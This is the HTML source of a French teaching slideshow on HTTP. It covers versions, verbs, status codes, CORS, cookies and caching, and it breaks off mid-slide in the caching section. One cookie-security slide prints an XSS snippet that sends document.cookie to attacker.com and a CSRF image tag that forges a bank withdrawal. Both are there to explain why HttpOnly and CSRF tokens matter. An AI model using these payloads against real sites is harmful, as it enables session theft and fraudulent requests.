index.html

<!DOCTYPE html>
<html lang="fr">
    <head>
        <meta charset="utf-8" />
        <title>Présentation de HTTP</title>
        <link href="css/default.css" class="theme" rel="stylesheet" media="screen" />
        <style>
            .slide h2 { font-size: 2em; }
            a { color: #654; text-decoration: underline; border-bottom:  none; }
            li { font-size: 1.4em; padding: 5px 0; }
            abbr { border-bottom: 1px dashed #654; }
            section { margin: 2em 2em 0 2em }
            ol li { list-style: decimal inside; }
            ul li { list-style: square outside; }
            pre { overflow-x: auto; }
            pre.client { background: url("imgs/computer.png") no-repeat 98% 10px, #EADDE8; }
            pre.server { background: url("imgs/server_lightning.png") no-repeat 98% 10px, #EADDE8; }
            kbd { white-space: pre; }
        </style>
    </head>
    <body>
        <div class="presentation">
            <div id="presentation-counter">Loading...</div>
             <div class="slides">
                 <div class="slide" id="landing-slide">
                     <style>
                        #landing-slide p { font-size: 35px; }
                    </style>
                    <section class="middle">
                    <p>Cette présentation est un site en HTML5</p>
                    <p>Appuyez sur la touche <span id="left-init-key" class="key">&rarr;</span> pour avancer.</p>
                    </section>
                </div>

                <div class="slide" id="title-slide">
                    <style>
                        #title-slide h1, #title-slide h2 { color: black; }
                        #title-slide h1 { letter-spacing: 2px; font-size: 70px; }
                        #title-slide h2 { margin-top: 1em; font-size: 36px; color: #665544; }
                    </style>
                    <section class="middle">
                    <h1>HTTP</h1>
                    <h2>HyperText Transfer Protocol</h2>
                    <h3>Grégory PAUL - <a href="https://paulgreg.me" title="Portfolio">paulgreg.me</a></h3>
                    </section>
                </div>

                <div class="slide" id="about">
                    <style>
                    #about ul                                    { display: inline-block; width: 45%;  }
                    #about ul.next                               { float: right;}
                    #about .logo                                 { width: 200px; }
                    #about .mappy-home,
                    #about .mappy-immersive                      { width: 430px; position: absolute; top: 340px; border: 1px solid black }
                    #about .mappy-home                           { left: 10px; }
                    #about .mappy-immersive                      { left: 450px; }
                    </style>
                    <section>
                    <h2>Présentation</h2>
                    <ul>
                        <li>Grégory PAUL
                        <li>Développeur Web<br>
                            (<a href="https://twitter.com/search?q=%23javascript%20from%3Apaulgreg&src=typd">JavaScript</a>,
                            <a href="https://twitter.com/search?q=%23security%20from%3Apaulgreg&src=typd">sécurité</a>,
                            <a href="https://twitter.com/search?l=&q=%23diy%20OR%20%23hack%20from%3Apaulgreg&src=typd">hack/DIY</a>)
                        <li><a href="https://twitter.com/paulgreg" rel="me">@paulgreg</a>,
                            <a href="https://paulgreg.me/" rel="me">https://paulgreg.me</a>
                    </ul>
                    <ul class="next">
                        <li><img alt="Mappy" src="imgs/mappy-logo.png" class="logo" />
                        <li>
                            <a href="https://fr.mappy.com/">cartes</a>, <a href="https://fr.mappy.com/itineraire">itinéraires</a>,
                            <a href="https://fr.mappy.com/#/720/M1/THome/N-397.03335,1,2.29203,48.8608/Z15/">vues immersives</a> <small>(en <a href="http://techblog.mappy.com/vues-360-en-webgl.html">webGL</a>)</small>,
                            <a href="https://fr.mappy.com/poi/5190c34184ae2d329f8f47ed">~4 500 000 <abbr title="Point Of Interest">POI</abbr></a>
                        <li>~ 1 000 000 visites par jour
                        <img class="mappy-home" alt="" src="imgs/mappy-home.png" />
                        <img class="mappy-immersive" alt="" src="imgs/mappy-immersive.png" />
                    </ul>
                    </section>
                </div>

                <div class="slide" id="summary-slide">
                    <section>
                    <h2>Sommaire</h2>
                    <ol>
                        <li>Vue d’ensemble
                        <li>Versions 0.9, 1.0. 1.1
                        <li>Verbes
                        <li>Codes de retour
                        <li>Négociation de contenu
                        <li>Réponse partielle
                        <li>SOP, CORS
                        <li>Cookies
                        <li>Cache
                        <li>Authentification
                        <li>HTTP 2.0
                    </ol>
                    </section>
                </div>

                <div class="slide" id="overview-title-slide">
                    <section class="middle">
                    <h2>Vue d’ensemble</h2>
                    </section>
                </div>
                <div class="slide" id="overview-model-slide">
                    <section>
                    <h2><a href="https://fr.wikipedia.org/wiki/Mod%C3%A8le_OSI">Modèle <abbr title="Open Systems Interconnection">OSI</abbr></a></h2>
                    <!-- TODO: supprimer session pour TCP !-->
                    <p class="center"><img src="imgs/tcp-ip-stack.png" title="Couches réseau" alt="Couches réseau" /></p>
                    </section>
                </div>
                <div class="slide" id="network-diagram-slide">
                    <section>
                    <h2>Illustration</h2>
                    <p class="center"><img src="imgs/illustration.png" title="Diagramme réseau HTTP" alt="Diagramme réseau HTTP" /></p>
                    </section>
                </div>
                <div class="slide" id="overview-example-slide">
                    <section>
                    <h2>HTTP à la main</h2>
                    <p>Connexion à <a href="http://neverssl.com">http://neverssl.com</a></p>
                    <pre>
➜  ~ <strong>host neverssl.com
neverssl.com</strong> has address <strong>52.85.74.244</strong>
</pre>
<pre>
➜  ~ <strong>telnet 52.85.74.244 80</strong>
Trying 52.85.74.244...
Connected to 52.85.74.244.
Escape character is '^]'.
<strong>GET / HTTP/1.1
Host: neverssl.com

HTTP/1.1 200 OK</strong>
Content-Type: text/html
Content-Length: 2536
Date: Sat, 18 Aug 2018 21:13:03 GMT
...
<strong>&lt;html&gt;</strong>...
</pre>
ou plus simplement...
<pre><strong>curl -I -v -XGET http://neverssl.com/</strong></pre>
              </section>
          </div>

          <div class="slide" id="request-diagram-slide">
              <section>
              <h2>Séquence</h2>
              <p class="center"><img src="imgs/http-sequence.png" title="Diagramme requête HTTP" alt="Diagramme requête HTTP" /></p>
              </section>
          </div>

          <div class="slide" id="URI-URL-URN-title-slide">
              <section class="middle">
              <h2>(URI / URL / URN)</h2>
              </section>
          </div>
          <div class="slide" id="URI-URL-URN-slide">
              <section>
              <h2>URI / URL / URN</h2>
              <img width="200" src="imgs/URI-URL-URN.svg" style="float: left; margin: .5em 2em 0 0" alt="URN / URL / URI" title="URN / URL / URI" />
              <p>Une <abbr title="Uniform Resource Identifier">URI</abbr> identifie.</p>
              <p>Une <abbr title="Uniform Resource Locator">URL</abbr> identifie et localise.</p>
              <p>une <abbr title="Uniform Resource Name">URN</abbr> identifie et nomme.</p>
              <h3>URLs :</h3>
              <ul>
                  <li>http://www.damnhandy.com/
                  <li>mailto:someone@example.com
                  <li>file:///home/someuser/somefile.txt
              </ul>
              <h3>URNs :</h3>
              <ul>
                  <li>urn:mpeg:mpeg7:schema:2001urn:isbn:0451450523
                  <li>urn:sha1:YNCKHTQCWBTRNJIV4WNAE52SJUQCZO5C
                  <li>urn:uuid:6e8bc430-9c3a-11d9-9669-0800200c9a66
              </ul>
              <h3>Et n’oubliez pas</h3>
              « <a href="https://www.w3.org/Provider/Style/URI">Cool URIs don’t change</a> » (depuis 1998)
              </section>
          </div>

          <div class="slide" id="versions-details-title-slide">
              <section class="middle">
              <h2>HTTP 0.9, 1.0 et 1.1</h2>
              </section>
          </div>

          <div class="slide" id="http-0-9-slide">
              <section>
              <h2>HTTP 0.9</h2>
              <ul>
                  <li>inventé en 1989 par <a href="http://www.w3.org/People/Berners-Lee/">Tim Berners-Lee</a> et <a href="http://www.robertcailliau.eu/Welcome-en.html">Robert Cailliau</a> au <abbr title="Conseil Européen pour la Recherche Nucléaire">CERN</abbr>
                  <li>n’est <strong>pas</strong> un standard
                  <li>un seul verbe : <strong>GET</strong>
                  <li>port <strong>80</strong>
                  <li>introduit les concepts d’URI, de code de retour, d’entêtes
                  <li>sans état...
                  <li>...mais <a href="http://www.montulli.org/lou">Lou Montulli</a> invente les <strong>cookies</strong> en 94 pour un site d’ecommerce
                  <li>en 1993, le <abbr title="National Center for Supercomputing Applications">NCSA</abbr> créé le navigateur <a href="ftp://ftp.ncsa.uiuc.edu/Mosaic/">Mosaic</a>
                      et le serveur <a href="http://httpd.apache.org/ABOUT_APACHE.html">HTTPd</a> qui deviendra <i>Apache HTTP Server</i>
              </ul>
              </section>
          </div>

          <div class="slide" id="http-1-0-slide">
              <section>
              <h2>HTTP 1.0</h2>
              <ul>
                  <li>en 1996, <a href="http://tools.ietf.org/html/rfc1945"><abbr title="Request for comment">RFC</abbr> 1945</a> par l’<abbr title="Internet Engineering Task Force">IETF</abbr>
                  <li>verbe <strong>GET</strong>, <strong>POST</strong>, <strong>HEAD</strong> mais aussi <strong>PUT</strong>, <strong>DELETE</strong>, LINK, UNLINK
                  <li>standardisation des entêtes, des réponses, des codes d’erreurs
                  <li>cache côté client via <code>Last-modified</code>, <code>Pragma</code>, <code>Expires</code>
                  <li>compression via <code>Accept-encoding</code> et <code>Content-encoding</code>
              </ul>
              </section>
          </div>
          <div class="slide" id="http-1-1-slide">
              <style>
                #http-1-1-slide img { margin-left: .1em }
              </style>
              <section>
              <h2>HTTP 1.1</h2>
              <ul>
                  <li><a href="http://tools.ietf.org/html/rfc2068"><abbr title="Request for comment">RFC</abbr> 2068</a> en 1997 + <a href="http://www.w3.org/Protocols/">19 révisions</a> entre 2007 et 2012
                  <li>OPTIONS, CONNECT et TRACE (<del>LINK</del>, <del>UNLINK</del>)
                  <li>en-tête <code>Host</code> <small>(permettant plusieurs sites web depuis une même IP)</small>
                  <li>négociation de langue et de contenu (<code>Accept*</code>),
                  <li>envoi de la réponse en morceaux via <code>Transfer-Encoding: chunked</code>
                      <small>(souvenez-vous des premiers chats « temps réel »)</small>
                  <li>
                      <code>Connection: keep-alive</code> permettant le pipelining :
                      <img src="imgs/pipeline.png" alt="HTTP Pipelining" style="width:400px; margin: .5em 0 .5em 6em; border: 1px solid black;" />
              </ul>
              </section>
          </div>


          <div class="slide" id="verbs-title-slide">
              <section class="middle">
              <h2>Verbes</h2>
              </section>
          </div>
          <div class="slide" id="verbs-slide">
              <style>
                  #verbs-slide .used span { font-weight: bold; }
                  #verbs-slide span:after { color: #654; margin-left: .5em;  font-size: .7em; vertical-align: super; font-weight: normal;  }
                  #verbs-slide .idempotent span:after { content: "idempotent"; }
                  #verbs-slide .safe.idempotent span:after { content: "safe, idempotent"; }
              </style>
              <section>
              <h2>Verbes</h2>
              <ul>
                  <li class="safe idempotent used"><span>GET</span> : récupération d’une ressource
                  <li class="safe idempotent used"><span>HEAD</span> : seulement les entêtes
                  <li class="used"><span>POST</span> : soumission d’un formulaire / modification d’une ressource
                  <li class="idempotent used"><span>PUT</span> : création d’une ressource
                  <li class="idempotent used"><span>DELETE</span> : suppression d’une ressource
                  <li class="safe idempotent"><span>TRACE</span> : echo de la requête
                  <li class="safe idempotent"><span>OPTIONS</span> : informations complémentaires sur la resource
                  <li class=""><span>CONNECT</span> : SSL/TLS pour les proxies
                  <li class=""><span>PATCH</span> : modification partielle <small>(<a href="https://tools.ietf.org/html/rfc5789">RFC 5789</a>, mai 2010)</small>
              </ul>
              <!-- TODO: Mettre un tableau -->
              </section>
          </div>

          <div class="slide" id="status-code-title-slide">
              <section class="middle">
              <h2>Code de retour (status code)</h2>
              </section>
          </div>
          <div class="slide" id="status-code-slide">
              <style>
                  #status-code-slide ul > li > ul {
                      max-height: 90px; overflow-y: auto;border: 1px dotted #654;
                      font-size: 10px; column-count: 2;
                  }
                  #status-code-slide ul > li > ul > li { padding: 0; }
              </style>
              <section>
              <h2><a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html">Codes de retour</a></h2>
              <ul>
                  <li class="100">1xx Informational
                  <ul>
                      <li>100 Continue
                      <li>101 Switching Protocols
                      <li>102 Processing (<a href="/wiki/WebDAV" title="WebDAV">WebDAV</a>; RFC 2518)
                  </ul>
                  <li class="200">2xx Success
                  <ul>
                      <li>200 OK
                      <li>201 Created
                      <li>202 Accepted
                      <li>203 Non-Authoritative Information (since HTTP/1.1)
                      <li>204 No Content
                      <li>205 Reset Content
                      <li>206 Partial Content
                      <li>207 Multi-Status (WebDAV; RFC 4918)
                      <li>208 Already Reported (WebDAV; RFC 5842)
                      <li>226 IM Used (RFC 3229)
                  </ul>
                  <li class="300">3xx Redirection
                  <ul>
                      <li>300 Multiple Choices
                      <li><a href="https://en.wikipedia.org/wiki/HTTP_301" title="HTTP 301">301 Moved Permanently</a>
                      <li><a href="https://en.wikipedia.org/wiki/HTTP_302" title="HTTP 302">302 Found</a>
                      <li><a href="https://en.wikipedia.org/wiki/HTTP_303" title="HTTP 303">303 See Other</a> (since HTTP/1.1)
                      <li>304 Not Modified
                      <li>305 Use Proxy (since HTTP/1.1)
                      <li>306 Switch Proxy
                      <li>307 Temporary Redirect (since HTTP/1.1)
                      <li>308 Permanent Redirect (approved as experimental)
                  </ul>
                  <li class="400">4xx Client Error
                  <ul>
                      <li>400 Bad Request
                      <li>401 Unauthorized
                      <li>402 Payment Required
                      <li><a href="https://en.wikipedia.org//wiki/HTTP_403" title="HTTP 403">403 Forbidden</a>
                      <li><a href="https://en.wikipedia.org//wiki/HTTP_404" title="HTTP 404">404 Not Found</a>
                      <li>405 Method Not Allowed
                      <li>406 Not Acceptable
                      <li>407 Proxy Authentication Required
                      <li>408 Request Timeout
                      <li>409 Conflict
                      <li>410 Gone
                      <li>411 Length Required
                      <li>412 Precondition Failed
                      <li>413 Request Entity Too Large
                      <li>414 Request-URI Too Long
                      <li>415 Unsupported Media Type
                      <li>416 Requested Range Not Satisfiable
                      <li>417 Expectation Failed
                      <li>418 I'm a teapot (RFC 2324)
                      <li>420 Enhance Your Calm (Twitter)
                      <li>422 Unprocessable Entity (WebDAV; RFC 4918)
                      <li>423 Locked (WebDAV; RFC 4918)
                      <li>424 Failed Dependency (WebDAV; RFC 4918)
                      <li>424 Method Failure (<a href="https://en.wikipedia.org//wiki/WebDAV" title="WebDAV">WebDAV</a>)
                      <li>425 Unordered Collection (Internet draft)
                      <li>426 Upgrade Required (RFC 2817)
                      <li>428 Precondition Required (<a class="external mw-magiclink-rfc" href="//tools.ietf.org/html/rfc6585">RFC 6585</a>)
                      <li>429 Too Many Requests (<a class="external mw-magiclink-rfc" href="//tools.ietf.org/html/rfc6585">RFC 6585</a>)
                      <li>431 Request Header Fields Too Large (<a class="external mw-magiclink-rfc" href="//tools.ietf.org/html/rfc6585">RFC 6585</a>)
                      <li>444 No Response (Nginx)
                      <li>449 Retry With (Microsoft)
                      <li>450 Blocked by Windows Parental Controls (Microsoft)
                      <li>451 Unavailable For Legal Reasons (Internet draft)
                      <li>494 Request Header Too Large (Nginx)
                      <li>495 Cert Error (Nginx)
                      <li>496 No Cert (Nginx)
                      <li>497 HTTP to HTTPS (Nginx)
                      <li>499 Client Closed Request (Nginx)
                  </ul>
                  <li class="500">5xx Server Error
                  <ul>
                      <li>500 Internal Server Error
                      <li>501 Not Implemented
                      <li>502 Bad Gateway
                      <li>503 Service Unavailable
                      <li>504 Gateway Timeout
                      <li>505 HTTP Version Not Supported
                      <li>506 Variant Also Negotiates (RFC 2295)
                      <li>507 Insufficient Storage (WebDAV; RFC 4918)
                      <li>508 Loop Detected (WebDAV; RFC 5842)
                      <li>509 Bandwidth Limit Exceeded (Apache bw/limited extension)
                      <li>510 Not Extended (RFC 2774)
                      <li>511 Network Authentication Required (<a class="external mw-magiclink-rfc" href="//tools.ietf.org/html/rfc6585">RFC 6585</a>)
                      <li>598 Network read timeout error (Unknown)
                      <li>599 Network connect timeout error (Unknown)
                  </ul>
              </ul>
              </section>
          </div>

          <div class="slide" id="content-negociation-title-slide">
              <section class="middle">
              <h2>Négociation de contenu</h2>
              </section>
          </div>
          <div class="slide" id="content-negociation-basics-slide">
              <section>
              <h2>Négociation de contenu</h2>
              <h3>Navigateur demandant une page web</h3>
<pre class="client">GET / HTTP/1.1
Host: www.exemple.org
<strong>Accept: text/html; q=1.0, text/*; q=0.8, image/gif; q=0.6, image/jpeg; q=0.6, image/*; q=0.5, */*; q=0.1
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip,deflate
Accept-Language: fr-FR; q=1.0, en; q=0.5</strong>
... </pre>
<pre class="server">HTTP/1.1 200 OK
<strong>Content-Encoding: gzip
Content-Length: 25719
Content-type: text/html; charset=UTF-8
Content-Language: en-US</strong>
...</pre>
<p><code>q</code> est un « facteur de qualité relatif » (priorité), cf <a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html">RFC2616</a>.
            </section>
        </div>

          <div class="slide" id="content-negociation-slide">
              <section>
              <h2>Négociation de contenu</h2>
              <h3>Client d’API REST</h3>
<pre class="client">GET /shops/all/address HTTP/1.1
Host: www.exemple.org
<strong>Accept: application/json; q=1.0, text/xml; q=0.8
Accept-Charset: ISO-8859-1,utf-8; q=0.7, *; q=0.3
Accept-Encoding: gzip,deflate
Accept-Language: fr-FR; q=1.0, en; q=0.5</strong>
... </pre>
<pre class="server">HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Length: 25719
<strong>Content-type: application/json; charset=utf-8
Content-Language: en-US</strong>
 ...</pre>
              </section>
          </div>

          <div class="slide" id="partial-request-title-slide">
              <section class="middle">
              <h2>Requête et réponse partielle</h2>
              </section>
          </div>
          <div class="slide" id="partial-request-slide">
              <section>
              <h2>Requête et réponse partielle</h2>
<pre class="client"><strong>HEAD /2390/2253727548_a413c88ab3_s.jpg HTTP/1.1</strong>
Host: farm3.static.flickr.com</pre>
<pre class="server">HTTP/1.0 200 OK
Date: Mon, 05 May 2008 00:33:14 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
<strong>Content-Length: 3980</strong>
Content-Type: image/jpeg</pre>
<pre class="client">GET /2390/2253727548_a413c88ab3_s.jpg HTTP/1.1
Host: farm3.static.flickr.com
<strong>Range: bytes=0-999</strong></pre>
<pre class="server"><strong>HTTP/1.0 206 Partial Content</strong>
Date: Mon, 05 May 2008 00:36:57 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
<strong>Content-Length: 1000
Content-Range: bytes 0-999/3980</strong>
Content-Type: image/jpeg
...</pre>
<p>Utilisé pour reprendre les téléchargements ou pour les médias (audio, vidéo, <a href="https://paulgreg.me/https-slides/?full#interception-traffic-http-video">exemple</a>)
              </section>
          </div>

          <div class="slide" id="sop-title-slide">
              <section class="middle">
              <h2>Same Origin Policy</h2>
              </section>
          </div>

          <div class="slide" id="sop-slide">
              <style>
                #sop-slide table td { border-bottom: 1px dashed black; padding: .1em .25em; }
                #sop-slide .ok { background:#9F9; vertical-align:middle;text-align:center; }
                #sop-slide .ko { background:#F99; vertical-align:middle;text-align:center; }
              </style>
              <section>
              <h2>Same Origin Policy</h2>
              <p>Mécanisme des navigateurs qui restreint l’interaction d’un script JS en fonction de son origine (appel Ajax, cookie, localStorage, IndexedDB).</p>
              <h3>Même origine ?</h3>
              <table>
                  <tr><th>URL</th><th>Outcome</th><th>Reason</th></tr>
                  <tr><td><b>http://www.example.com</b>/</td><td class="ok">OK</td><td>Protocol, host and port</td></tr>
                  <tr><td><b>http://www.example.com</b>/other.html</td><td class="ok">OK</td><td>Same protocol, host and port</td></tr>
                  <tr><td><b>http://</b>user:password@<b>www.example.com</b>/</td><td class="ok">OK</td><td>Same protocol, host and port</td></tr>
                  <tr><td>http://www.example.com:<b>81</b>/</td><td class="ko">KO</td><td>Different port</td></tr>
                  <tr><td><b>https</b>://www.example.com/</td><td class="ko">KO</td><td>Different protocol</td></tr>
                  <tr><td>http://<b>en.example.com</b>/</td><td class="ko">KO</td><td>Different host</td></tr>
                  <tr><td>http://<b>example.com</b>/</td><td class="ko">KO</td><td>Different host</td></tr>
                  <tr><td>http://<b>v2.www.example.com</b>/</td><td class="ko">KO</td><td>Different host</td></tr>
              </table>
              <h3>Comment faire un appel Ajax sur un autre domaine ?</h3>
              <p>Historiquement en <abbr title="JSON with Padding">JSONP</abbr> ou maintenant avec CORS</p>
              </section>
          </div>

          <div class="slide" id="cors-title-slide">
              <section class="middle">
              <h2>Cross-Origin Resource Sharing</h2>
              </section>
          </div>

          <div class="slide" id="cors-simple-slide">
              <section>
              <h2>Cross-Origin Resource Sharing</h2>
              <h3>1. Requêtes simples</h3>
              <p>GET, HEAD, POST sous <a href="https://developer.mozilla.org/fr/docs/Web/HTTP/CORS#Requ%C3%AAtes_simples">certaines conditions</a></p>
              <p>Depuis <i>inside.com/index.html</i>, je souhaite appeler <i>outside.com/file.json</i></p>
<pre class="client">GET /file.json HTTP/1.1
Host: outside.com
Accept: text/html;q=0.9,*/*;q=0.8
Referer: http://inside.com/index.html
<strong>Origin: http://inside.com</strong></pre>
<pre class="server">HTTP/1.1 200 OK
<strong>Access-Control-Allow-Origin: http://inside.com</strong>
Content-Type: application/json

[json data]</pre>
              <p>Sans l’entête <code>Access-Control-Allow-Origin</code>, le navigateur bloquera le contenu (notez que le serveur a servi sa réponse).</p>
              <!-- TODO: Mettre un shéma -->
              </section>
          </div>

          <div class="slide" id="cors-complex-1-slide">
              <section>
              <h2>Cross-Origin Resource Sharing</h2>
              <h3>2. Requêtes complexes nécessitant une requête préliminaire (preflight)</h3>
              <p>PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH ou <a href="https://developer.mozilla.org/fr/docs/Web/HTTP/CORS#Requ%C3%AAtes_n%C3%A9cessitant_une_requ%C3%AAte_pr%C3%A9liminaire">si certains entêtes/valeurs</a></p>
              <p>Le navigateur envoie une requête préliminaire (preflight)</p>
<pre class="client">OPTIONS /resource/ HTTP/1.1
Host: outside.com
Referer: http://inside.com/form.html
<strong>Origin: http://inside.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: X-PINGOTHER, Content-Type</strong></pre>
<pre class="server">HTTP/1.1 200 OK
<strong>Access-Control-Allow-Origin: http://inside.com
Access-Control-Allow-Methods: PUT, GET
Access-Control-Allow-Headers: X-PINGOTHER, Content-Type
Access-Control-Max-Age: 86400</strong>
Content-Length: 0</pre>
<p>Le serveur autorise le verbe PUT et les entêtes spéciaux, le navigateur envoie alors la vraie requête</p>
              </section>
          </div>
          <div class="slide" id="cors-complex-2-slide">
              <section>
              <h2>Cross-Origin Resource Sharing</h2>
<pre class="client">
PUT /resource/ HTTP/1.1
Host: service.com
Referer: http://example.org/form.html
<strong>Origin: http://example.org
X-PINGOTHER: pingpong
Content-Type: text/xml; charset=UTF-8</strong>
Content-Length: 10

[body data]</pre>
<pre class="server">
HTTP/1.1 200 OK
<strong>Access-Control-Allow-Origin: http://example.org</strong></pre>
              </section>
          </div>

          <div class="slide" id="cookie-title-slide">
              <section class="middle">
              <h2>Les Cookies</h2>
              <a href="http://www.instructables.com/id/HTTP-Sugar-Cookies/"><img src="imgs/cookies.jpg" width="600" alt="" title="Image from http://www.instructables.com/id/HTTP-Sugar-Cookies/" /></a>
              </section>
          </div>
          <div class="slide" id="cookie-example-slide">
              <section>
              <h2>Les Cookies : exemple</h2>
<pre class="client"><strong>GET / HTTP/1.1</strong>
Host: www.exemple.org
...</pre>
<pre class="server"><strong>HTTP/1.1 200 OK</strong>
Content-type: text/html
<strong>Set-Cookie: name=value</strong>
...</pre>
<pre class="client"><strong>GET /page.html HTTP/1.1</strong>
Host: www.exemple.org
<strong>Cookie: name=value</strong>
...</pre>
Peut également être lu et écrit en JavaScript via <pre>document.cookie</pre>
              </section>
          </div>

          <div class="slide" id="cookie-details-slide">
              <section>
              <h2>Les Cookies</h2>
              <ul>
                  <li>Défini pour un nom de domaine <small>(www.domain.com)</small>
                  <li>limité à 20 cookies par domaine, d’environ 4000 caractères
                  <li>Envoyé à <strong>chaque requête</strong> sur le domaine du cookie <small>(html, JS, Ajax, images, etc)</small>
                  <li>Cookie = contenu personnalisé = <strong>pas de cache</strong> intermédiaire
                  <li>D’où l’intérêt de servir les ressources communes <small>(images, css, js)</small> depuis un autre sous-domaine <small>(static.domain.com)</small>
                  <li>Cookie de <strong>session</strong> (jusqu’à fermeture de l’onglet) vs persistant
                  <li>Cookie chiffré (contenu chiffré par le serveur)
              </ul>
              </section>
          </div>

          <div class="slide" id="cookie-first-third-party-slide">
            <style>
                #cookie-first-third-party-slide p { text-align: center; }
            </style>
             <section>
             <h2>Les Cookies</h2>
             <ul>
                 <li>Cookie <strong>first</strong> / <strong>third</strong> party
             </ul>
             <p><img src="imgs/cookie-parties.png" title="First / third party cookie" alt=""/></p>
             </section>
          </div>


          <div class="slide" id="cookie-details-2-slide">
              <section>
              <h2>Les Cookies : attributs facultatifs</h2>
              <ul>
                  <li>un nom de domaine <small>(pour permettre le "cross-subdomain")</small>,
                  <li>un chemin,
                  <li>date d'expiration <small>(cookie de « session » sans)</small>,
                  <li>Flag <strong>secure</strong> (non transmis sans TLS)
                  <li>Flag <strong>HttpOnly</strong> (invisible pour JavaScript)
              </ul>
              <h3>Exemples</h3>
              <pre class="server">Set-Cookie: LSID=DQA…mvYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-2021 22:23:01 GMT; Secure; HttpOnly</pre>
              <pre class="server">Set-Cookie: HSID=AYQ…rdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-2021 22:23:01 GMT; HttpOnly</pre>
              <p><strong>secure</strong> et <strong>HttpOnly</strong> sont très important contre le vol de cookie.</p>
              </section>
          </div>
          <div class="slide" id="cookie-security-slide">
              <section>
              <h2>Vol de cookie (cookie hijacking)</h2>
              <h3>À la main</h3>
              <p>il suffit de récupèrer le cookie et le « copier » dans son navigateur. <small>Certains services vérifient l’IP ou l’user-agent pour détecter ce genre de manipulation et bloque la connexion.</small></p>
              <h3>Via Firesheep (2010)</h3>
              <p><a href="http://codebutler.com/firesheep?c=1"><img src="imgs/firesheep.png" alt="Firesheep" title="Firesheep" /></a></p>
              <p>D’où le passage à HTTPS et le flag <i>secure</i>.</p>
              </section>
          </div>
          <div class="slide" id="cookie-security-2-slide">
              <section>
              <h2>Vol de cookie (cookie hijacking)</h2>
              <h3>Cross-Site Scripting (XSS)</h3>
              <p>Un attaquant poste cela sur un site :</p>
              <pre>&lt;a href="" onclick="<strong>location='//attacker.com/?cookie='+document.cookie</strong>"&gt;hello&lt;/a&gt;</pre>
              <p>D’où l’intérêt du flag <i>HttpOnly</i>.</p>
              <h3>Cross-Site Request Forgery (CSRF)</h3>
              <p>Un attaquant poste cela sur un site :</p>
              <pre>&lt;img src="<strong>//bank.com/withdraw?amount=100&amp;for=attacker</strong>"&gt;</pre>
              <p>Pour l’éviter, le serveur doit envoyer un jeton unique et aléatoire avant chaque requête « importante ». Le client doit obligatoirement le retransmettre dans la requête suivante.</p>
              </section>
          </div>
          <!-- TODO: Parler des JSON Web Tokens -->
          <div class="slide" id="cache-title-slide">
              <section class="middle">
              <h2>Cache</h2>
              </section>
          </div>
          <div class="slide" id="cache-in-action-slide">
              <section>
              <h2>Cache : En Action</h2>
              <h3>Chargement initial, sans cache :</h3>
              <img src="imgs/twitter-1.png" alt="First twitter load" title="First twitter load" />
              <h3>Rechargement de la même page :</h3>
              <img src="imgs/twitter-2.png" alt="Second twitter load" title="Second twitter load" />
              </section>
          </div>
          <div class="slide" id="cache-type-slide">
              <section>
              <h2>Cache : Introduction</h2>
              <h3>Qui ?</h3>
              <ul>
                  <li>Navigateur / Client
                  <li>Proxy <small>(squid, équipement réseau ou « network appliance »)</small>
                  <li>Reverse-proxy <small>(squid, varnish, etc)</small>
                  <li><abbr title="Content Delivery Network">CDN</abbr> <small>(CloudFlare, Amazon Cloud Front, Akamai,...)</small>
              </ul>
              <h3>2 types :</h3>
              <ul>
                  <li>Cache privé (client final tel qu’un navigateur)
                  <li>Cache public (intermédaire tel qu’un proxy)
              </ul>
              <h3>Définitions :</h3>
              <ul>
                  <li style="color: green;">✔ cache hit
                  <li style="color: red;">✘ cache miss
                  <li style="color: blue;">revalidation
              </ul>
              </section>
          </div>
          <div class="slide" id="cache-date-expires-slide">
              <section>
              <h2>Cache : Date et Expires</h2>
<pre class="server"><strong>Date</strong>: Tue, 04 Sep 2016 09:24:26 GMT
<strong>Expires</strong>: Thu, 01 Dec 1994 16:00:00 GMT</pre>
              <ul>
                  <li><code>Date</code> obligatoire !
                  <li><code>Expires &gt; now</code> : caché jusqu’à la date indiquée puis revalidation
                  <li><code>Expires == now</code> : caché mais revalidation à la prochaine requête
                  <li><code>Expires &lt; now || Expires == -1</code> : pas de cache
              </ul>
              </section>
          </div>
          <div class="slide" id="cache-control-slide">
              <section>
              <h2>Cache : Cache-Control</h2>
              <ul>
                  <li><code>Cache-Control: private</code> : cache client
                  <li><code>Cache-Control: public</code> : cache client et proxy
                  <li><code>Cache-Control: no-cache</code> : cache client et proxy mais revalidation
                  <li><code>Cache-Control: no-cache=Set-Cookie</code> : pas de cache sur cet entête
                  <li><code>Cache-Control: no-store</code> : cache client ou proxy interdit
                  <li><code>Cache-Control: must-revalidate</code> : revalidation après expiration
                  <li><code>Cache-Control: proxy-revalidate</code> : idem mais pour les proxies
                  <li><code>Cache-Control: max-age=xxx</code> : temps relatif, en secondes
                  <li><code>Cache-Control: s-maxage=xxx</code> : idem mais que pour les proxies
                  <li><code>Cache-Control: no-transform</code> : les proxies ne doivent pas transformer le contenu
              </ul>
              <!-- TODO: Mettre un tableau -->
              </section>
          </div>
          <div class="slide" id="cache-last-modified-conditionnal-slide">
              <section>
              <h2>Cache : Last-Modified et requête conditionnelle</h2>
<pre class="client">GET /logo.png HTTP/1.1
...</pre>
<pre class="server">HTTP/1.1 200 OK
Date: Mon, 03 Sep 2012 15:05:20 GMT
Expires: Mon, 03 Sep 2012 15:05:20 GMT
<strong>Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT</strong>
...</pre>
Second appel
<pre class="client">GET /logo.png HTTP/1.1
<strong>If-Modified-Since: Mon, 02 Apr 2012 02:13:37 GMT</strong>
...</pre>
<pre class="server"><strong>HTTP/1.1 304 Not Modified</strong>
Date: Mon, 03 Sep 2012 15:07:07 GMT
Expires: Mon, 03 Sep 2012 15:07:07 GMT
...</pre>
              </section>
          </div>
          <div class="slide" id="cache-etag-conditionnal-slide">
              <section>
              <h2>Cache : Entity Tag et requête conditionnelle</h2>
<pre class="client">GET /logo.png HTTP/1.1
...</pre>
